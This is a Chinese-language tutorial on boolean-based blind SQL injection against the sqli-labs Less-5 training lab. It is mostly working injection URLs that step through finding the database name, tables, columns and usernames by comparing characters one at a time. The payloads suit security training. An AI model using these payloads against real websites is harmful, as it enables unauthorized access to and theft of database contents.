mysql 基于布尔的盲注

输入：http://192.168.87.130/sqli-labs/Less-5/?id=1' and 1=1 %23

输入正确时提示  you are in.......

输入：http://192.168.87.130/sqli-labs/Less-5/?id=1' and 1=2 %23

输入错误时，不提示任何信息

考虑是盲注

1，判断数据库第一位

http://192.168.87.130/sqli-labs/Less-5/?id=1' and left(database(),1)='s' %23

http://192.168.87.130/sqli-labs/Less-5/?id=1' and left(database(),1)>'a' %23

可以用二分法来提高注入的效率

left(database(),1)，database()显示数据库名称， left(a,b)从左侧截取 a 的前 b 位

判断正确，显示you are in.......

判断失败无显示

2.猜测数据库第二位

http://192.168.87.130/sqli-labs/Less-5/?id=1' and left(database(),2) > 'sa' %23

http://192.168.87.130/sqli-labs/Less-5/?id=1' and left(database(),2) = 'se' %23

3.判断数据库名称长度是否为8位

http://192.168.87.130/sqli-labs/Less-5/?id=1' and length(database())=8 %23

length(database())=8，判断数据库database()名的长度

4.利用 substr() ascii()函数进行尝试,猜测数据库中的第一个表的第一个字符

http://192.168.87.130/sqli-labs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 %23

ascii(x)=101，判断x的ascii码是否等于101，即email中的字母e

substr(a,b,c)从 b 位置开始， 截取字符串 a 的 c 长度

5.猜解第一个表的第二位字符，使用 substr(**,2,1)

http://192.168.87.130/sqli-labs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109 %23   

109即email中的字母m

6.猜解第二个表

上文中获取第一个表使用的 limit 0,1是从第0个开始，取第1个；那么获取第二个表使用 limit 1,1即可

http://192.168.87.130/sqli-labs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=114 %23

然后按照上述方法重复，就能够获取所有表的名字

7.使用regexp获取 users表中的列

用法介绍： select user() regexp '^[a-z]';

Explain： 正则表达式的用法， user()结果为 root， regexp 为匹配 root 的正则表达式。

第二位可以用 select user() regexp '^ro'来进行。

http://192.168.87.130/sqli-labs/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and table_name regexp '^us[a-z]' limit 0,1)--+

上述语句时选择 users 表中的列名是否有 us**的列

http://192.168.87.130/sqli-labs/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+

8.利用 ord（） 和 mid（） 函数获取 users 表的内容

http://192.168.87.130/sqli-labs/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+

Explain： mid(a,b,c)从位置 b 开始， 截取 a 字符串的 c 位

Ord()函数同 ascii()， 将字符转为 ascii 值

获取 users 表中的内容。 获取 username 中的第一行的第一个字符的 ascii， 与 68 进行比较，即为D

重复上述步骤即可，以上对布尔盲注 SQL 的所有的payload进行了展示。